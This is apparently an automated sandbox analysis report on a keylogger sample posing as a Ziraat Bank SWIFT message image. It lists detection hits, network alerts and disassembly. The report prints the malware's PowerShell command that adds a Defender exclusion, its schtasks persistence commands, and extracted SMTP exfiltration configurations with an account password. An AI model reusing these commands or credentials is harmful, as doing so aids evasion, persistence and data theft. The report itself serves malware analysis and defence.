Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe", ParentImage: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe, ParentProcessId: 2344, ParentProcessName: Ziraat_Bankasi_Swift_Messaji.png.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe", ProcessId: 2200, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Suspicious Add Scheduled Task Parent

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\BZTCUCKTKd" /XML "C:\Users\user\AppData\Local\Temp\tmpAE63.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\BZTCUCKTKd" /XML "C:\Users\user\AppData\Local\Temp\tmpAE63.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\BZTCUCKTKd.exe, ParentImage: C:\Users\user\AppData\Roaming\BZTCUCKTKd.exe, ParentProcessId: 7576, ParentProcessName: BZTCUCKTKd.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\BZTCUCKTKd" /XML "C:\Users\user\AppData\Local\Temp\tmpAE63.tmp", ProcessId: 7704, ProcessName: schtasks.exe

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\BZTCUCKTKd" /XML "C:\Users\user\AppData\Local\Temp\tmp9D7B.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\BZTCUCKTKd" /XML "C:\Users\user\AppData\Local\Temp\tmp9D7B.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe", ParentImage: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe, ParentProcessId: 2344, ParentProcessName: Ziraat_Bankasi_Swift_Messaji.png.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\BZTCUCKTKd" /XML "C:\Users\user\AppData\Local\Temp\tmp9D7B.tmp", ProcessId: 2924, ProcessName: schtasks.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe", ParentImage: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe, ParentProcessId: 2344, ParentProcessName: Ziraat_Bankasi_Swift_Messaji.png.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe", ProcessId: 2200, ProcessName: powershell.exe

Persistence and Installation Behavior

Sigma detected: Scheduled temp file as task from temp location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\BZTCUCKTKd" /XML "C:\Users\user\AppData\Local\Temp\tmp9D7B.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\BZTCUCKTKd" /XML "C:\Users\user\AppData\Local\Temp\tmp9D7B.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe", ParentImage: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe, ParentProcessId: 2344, ParentProcessName: Ziraat_Bankasi_Swift_Messaji.png.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\BZTCUCKTKd" /XML "C:\Users\user\AppData\Local\Temp\tmp9D7B.tmp", ProcessId: 2924, ProcessName: schtasks.exe

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-06T23:05:24.220980+0100	2803305	3	Unknown Traffic	192.168.2.4	49746	104.21.64.1	443	TCP
2025-03-06T23:05:24.771516+0100	2803305	3	Unknown Traffic	192.168.2.4	49747	104.21.64.1	443	TCP
2025-03-06T23:05:27.207823+0100	2803305	3	Unknown Traffic	192.168.2.4	49751	104.21.64.1	443	TCP
2025-03-06T23:05:27.788637+0100	2803305	3	Unknown Traffic	192.168.2.4	49752	104.21.64.1	443	TCP
2025-03-06T23:05:38.236995+0100	2803305	3	Unknown Traffic	192.168.2.4	49764	104.21.64.1	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-06T23:05:18.695406+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49736	132.226.247.73	80	TCP
2025-03-06T23:05:19.030222+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49738	132.226.247.73	80	TCP
2025-03-06T23:05:19.179812+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49739	132.226.247.73	80	TCP
2025-03-06T23:05:19.867330+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49740	132.226.247.73	80	TCP
2025-03-06T23:05:21.945459+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49736	132.226.247.73	80	TCP
2025-03-06T23:05:22.398693+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49739	132.226.247.73	80	TCP
2025-03-06T23:05:25.007957+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49749	132.226.247.73	80	TCP
2025-03-06T23:05:25.539246+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49750	132.226.247.73	80	TCP
2025-03-06T23:05:28.961118+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49753	132.226.247.73	80	TCP

Joe Security ANOMALY Telegram Send Message

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-06T23:05:50.254928+0100	1810007	1	Potentially Bad Traffic	192.168.2.4	63653	149.154.167.220	443	TCP
2025-03-06T23:05:52.948142+0100	1810007	1	Potentially Bad Traffic	192.168.2.4	63655	149.154.167.220	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: Ziraat_Bankasi_Swift_Messaji.png.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Roaming\BZTCUCKTKd.exe	Avira: detection malicious, Label: TR/AD.Nekark.jfiep
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Avira: detection malicious, Label: HEUR/AGEN.1305924
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Avira: detection malicious, Label: TR/ATRAPS.Gen

Found malware configuration

Source: 00000010.00000002.2951469963.0000000002101000.00000004.00000020.00020000.00000000.sdmp	Malware Configuration Extractor: MassLogger {"EXfil Mode": "SMTP", "From": "path@xma0.com", "Password": "london@1759", "Server": "mail.xma0.com"}
Source: 00000011.00000002.2954940699.00000000021E0000.00000004.00000020.00020000.00000000.sdmp	Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "phatbills@xma0.com", "Password": "london@1759", "Host": "mail.xma0.com", "Port": "587"}
Source: 00000011.00000002.2954940699.00000000021E0000.00000004.00000020.00020000.00000000.sdmp	Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "phatbills@xma0.com", "Password": "london@1759", "Host": "mail.xma0.com", "Port": "587", "Version": "4.4"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	ReversingLabs: Detection: 87%
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Virustotal: Detection: 60%	Perma Link
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	ReversingLabs: Detection: 87%
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Virustotal: Detection: 84%	Perma Link
Source: C:\Users\user\AppData\Roaming\BZTCUCKTKd.exe	ReversingLabs: Detection: 63%
Source: C:\Users\user\AppData\Roaming\BZTCUCKTKd.exe	Virustotal: Detection: 70%	Perma Link

Multi AV Scanner detection for submitted file

Source: Ziraat_Bankasi_Swift_Messaji.png.exe	Virustotal: Detection: 70%			Perma Link
Source: Ziraat_Bankasi_Swift_Messaji.png.exe	ReversingLabs: Detection: 63%

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.9% probability

Sample uses string decryption to hide its real strings

Source: 17.2.Native_snake01.exe.49c0f20.3.raw.unpack	String decryptor: phatbills@xma0.com
Source: 17.2.Native_snake01.exe.49c0f20.3.raw.unpack	String decryptor: london@1759
Source: 17.2.Native_snake01.exe.49c0f20.3.raw.unpack	String decryptor: mail.xma0.com
Source: 17.2.Native_snake01.exe.49c0f20.3.raw.unpack	String decryptor: phatbills2@xma0.com
Source: 17.2.Native_snake01.exe.49c0f20.3.raw.unpack	String decryptor: 587
Source: 17.2.Native_snake01.exe.49c0f20.3.raw.unpack	String decryptor:

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: Ziraat_Bankasi_Swift_Messaji.png.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49743 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49742 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49744 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49745 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:63649 version: TLS 1.0

Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:63653 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:63655 version: TLS 1.2

Source: Ziraat_Bankasi_Swift_Messaji.png.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: Irgg.pdb source: Ziraat_Bankasi_Swift_Messaji.png.exe, BZTCUCKTKd.exe.0.dr
Source:	Binary string: _.pdb source: Native_New-Nova.exe, 00000009.00000002.2953521524.0000000002261000.00000004.00000020.00020000.00000000.sdmp, Native_New-Nova.exe, 00000009.00000002.2963089780.00000000035D1000.00000004.00000800.00020000.00000000.sdmp, Native_New-Nova.exe, 00000009.00000002.2954150757.00000000023E0000.00000004.08000000.00040000.00000000.sdmp, Native_New-Nova.exe, 00000009.00000003.1730790993.0000000000599000.00000004.00000020.00020000.00000000.sdmp, Native_snake01.exe, 0000000A.00000002.2969436130.0000000004930000.00000004.08000000.00040000.00000000.sdmp, Native_snake01.exe, 0000000A.00000003.1732371805.0000000000768000.00000004.00000020.00020000.00000000.sdmp, Native_snake01.exe, 0000000A.00000002.2953656770.0000000002100000.00000004.00000020.00020000.00000000.sdmp, Native_New-Nova.exe, 00000010.00000002.2951469963.0000000002101000.00000004.00000020.00020000.00000000.sdmp, Native_New-Nova.exe, 00000010.00000002.2964034510.0000000004A80000.00000004.08000000.00040000.00000000.sdmp, Native_New-Nova.exe, 00000010.00000003.1775462812.000000000059F000.00000004.00000020.00020000.00000000.sdmp, Native_New-Nova.exe, 00000010.00000002.2962477768.0000000003421000.00000004.00000800.00020000.00000000.sdmp, Native_snake01.exe, 00000011.00000002.2954940699.00000000021E0000.00000004.00000020.00020000.00000000.sdmp, Native_snake01.exe, 00000011.00000003.1780357181.00000000006C8000.00000004.00000020.00020000.00000000.sdmp, Native_snake01.exe, 00000011.00000003.1776206771.0000000000680000.00000004.00000020.00020000.00000000.sdmp, Native_snake01.exe, 00000011.00000002.2969063278.00000000049C0000.00000004.08000000.00040000.00000000.sdmp, Native_snake01.exe, 00000011.00000003.1780044363.00000000006C8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Irgg.pdbSHA256 source: Ziraat_Bankasi_Swift_Messaji.png.exe, BZTCUCKTKd.exe.0.dr

Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h	9_2_0200E228
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 4x nop then jmp 04B593DAh	9_2_04B58FA8
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 4x nop then jmp 04B58C81h	9_2_04B589D0
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 4x nop then jmp 04B593DAh	9_2_04B59307
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 4x nop then jmp 05DF5185h	9_2_05DF4E48
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 4x nop then jmp 05DFF878h	9_2_05DFF5D0
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 4x nop then jmp 05DF4841h	9_2_05DF4598
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 4x nop then jmp 05DF7848h	9_2_05DF75A0
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 4x nop then jmp 05DFEFC8h	9_2_05DFED20
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 4x nop then jmp 05DF6F98h	9_2_05DF6CF0
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 4x nop then jmp 05DF3F91h	9_2_05DF3CE8
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 4x nop then jmp 05DF66E8h	9_2_05DF6440
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 4x nop then jmp 05DFE718h	9_2_05DFE470
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 4x nop then jmp 05DF5CCAh	9_2_05DF5C18
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 4x nop then jmp 05DF5CCAh	9_2_05DF5C20
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 4x nop then jmp 05DFDA10h	9_2_05DFD768
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 4x nop then jmp 05DF7CA0h	9_2_05DF79F8
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 4x nop then jmp 05DF4C99h	9_2_05DF49F0
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 4x nop then jmp 05DF73F0h	9_2_05DF7148
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 4x nop then jmp 05DF43E9h	9_2_05DF4140
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 4x nop then jmp 05DFF420h	9_2_05DFF178
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 4x nop then jmp 05DFEB70h	9_2_05DFE8C8
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 4x nop then jmp 05DF6B40h	9_2_05DF6898
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 4x nop then jmp 05DF3B39h	9_2_05DF3890
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 4x nop then jmp 05DFE2C0h	9_2_05DFE018
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 4x nop then jmp 05DFDE68h	9_2_05DFDBC0
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 4x nop then jmp 05DFFCD0h	9_2_05DFFA28
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 4x nop then jmp 05E751ADh	9_2_05E74FD0
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 4x nop then jmp 05E75B37h	9_2_05E74FD0
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 4x nop then jmp 05E73840h	9_2_05E73598
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	9_2_05E744D1
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 4x nop then jmp 05E70740h	9_2_05E70498
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 4x nop then jmp 05E726E0h	9_2_05E72438
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 4x nop then mov esp, ebp	9_2_05E787C0
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 4x nop then jmp 05E719D8h	9_2_05E71730
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 4x nop then jmp 05E7144Ah	9_2_05E711A0
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 4x nop then jmp 05E733E8h	9_2_05E73140
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 4x nop then jmp 05E702E8h	9_2_05E70040
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 4x nop then jmp 05E70FF0h	9_2_05E70D48
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 4x nop then jmp 05E72F90h	9_2_05E72CE8
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	9_2_05E74CF3
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 4x nop then jmp 05E72288h	9_2_05E71FE0
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 4x nop then jmp 05E740F0h	9_2_05E73E48
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 4x nop then jmp 05E73C98h	9_2_05E739F0
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 4x nop then jmp 05E70B98h	9_2_05E708F0
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 4x nop then jmp 05E72B38h	9_2_05E72890
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 4x nop then jmp 05E71E30h	9_2_05E71B88
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	9_2_05E74B13
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 4x nop then mov ecx, dword ptr [ebp-38h]	9_2_06181684
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 4x nop then mov ecx, dword ptr [ebp-38h]	9_2_061852E0
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 4x nop then jmp 0221F9C0h	10_2_0221FA0F
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 4x nop then jmp 0221F9C0h	10_2_0221FA81
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 4x nop then jmp 0221F9C0h	10_2_0221F820
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 4x nop then mov ecx, 000003E8h	10_2_061CFE70
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 4x nop then jmp 061C2D5Ch	10_2_061C2AA8
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 4x nop then jmp 061C3326h	10_2_061C2F08
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 4x nop then jmp 061CD09Ch	10_2_061CCDF0
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 4x nop then jmp 061C3326h	10_2_061C3254
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 4x nop then jmp 061CD4F4h	10_2_061CD248
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	10_2_061C0676
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 4x nop then mov ecx, 000003E8h	10_2_061CFE60
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 4x nop then jmp 061CD94Ch	10_2_061CD6A0
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 4x nop then jmp 061CDDA4h	10_2_061CDAF8
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 4x nop then jmp 061C0D10h	10_2_061C0B30
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 4x nop then jmp 061C16FBh	10_2_061C0B30
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 4x nop then jmp 061CE1FCh	10_2_061CDF50
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 4x nop then jmp 061CE654h	10_2_061CE3A8
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 4x nop then jmp 061CEAACh	10_2_061CE800
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 4x nop then jmp 061CEF04h	10_2_061CEC58
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	10_2_061C0856
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	10_2_061C0040
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 4x nop then jmp 061CF35Ch	10_2_061CF0B0
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 4x nop then jmp 061CF7B4h	10_2_061CF508
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 4x nop then jmp 061CFC0Ch	10_2_061CF960
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 4x nop then jmp 063B96F3h	10_2_063B9420
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 4x nop then jmp 063B712Ch	10_2_063B6E80
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 4x nop then jmp 063B8320h	10_2_063B7FE0
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 4x nop then jmp 063B62E4h	10_2_063B6038
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 4x nop then jmp 063BCCF9h	10_2_063BCA28
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 4x nop then jmp 063BFAE9h	10_2_063BF818
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 4x nop then jmp 063B32B4h	10_2_063B3008
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 4x nop then jmp 063BBF31h	10_2_063BBC60
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 4x nop then jmp 063B370Ch	10_2_063B3460
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 4x nop then jmp 063B1CFCh	10_2_063B1A50
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 4x nop then jmp 063BED21h	10_2_063BEA50
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 4x nop then jmp 063B02ECh	10_2_063B0040
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 4x nop then jmp 063B3B64h	10_2_063B38B8
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 4x nop then jmp 063B2154h	10_2_063B1EA8
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 4x nop then jmp 063B0744h	10_2_063B0498
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 4x nop then jmp 063B673Ch	10_2_063B6490
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 4x nop then jmp 063BDF59h	10_2_063BDC88
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 4x nop then jmp 063B4D2Ch	10_2_063B4A80
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 4x nop then jmp 063BC3C9h	10_2_063BC0F8
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 4x nop then jmp 063B0B9Ch	10_2_063B08F0
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 4x nop then jmp 063B6B96h	10_2_063B68E8
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 4x nop then jmp 063BF1B9h	10_2_063BEEE8
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 4x nop then jmp 063B7584h	10_2_063B72D8
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 4x nop then jmp 063B5184h	10_2_063B4ED8
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 4x nop then jmp 063BD191h	10_2_063BCEC0
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 4x nop then jmp 063B55DCh	10_2_063B5330
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 4x nop then jmp 063B79DCh	10_2_063B7730
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 4x nop then mov esp, ebp	10_2_063BB52A
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 4x nop then jmp 063BE3F1h	10_2_063BE120
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 4x nop then jmp 063B25ACh	10_2_063B2300
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 4x nop then jmp 063B2A04h	10_2_063B2758
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 4x nop then jmp 063BD629h	10_2_063BD358
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 4x nop then jmp 063B0FF4h	10_2_063B0D48
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 4x nop then jmp 063BE889h	10_2_063BE5B8
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 4x nop then jmp 063B2E5Ch	10_2_063B2BB0
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 4x nop then jmp 063B144Ch	10_2_063B11A0
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 4x nop then jmp 063BC861h	10_2_063BC590
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 4x nop then jmp 063B7E34h	10_2_063B7B88
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 4x nop then jmp 063B5A34h	10_2_063B5788
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 4x nop then jmp 063BF651h	10_2_063BF380
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 4x nop then jmp 063B18A4h	10_2_063B15F8
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 4x nop then jmp 063BDAC1h	10_2_063BD7F0
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 4x nop then jmp 063B5E8Ch	10_2_063B5BE0
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 4x nop then jmp 063BBA99h	10_2_063BB7C8
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 4x nop then jmp 064247B9h	10_2_064244E8
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 4x nop then jmp 06426EB3h	10_2_06426BB8
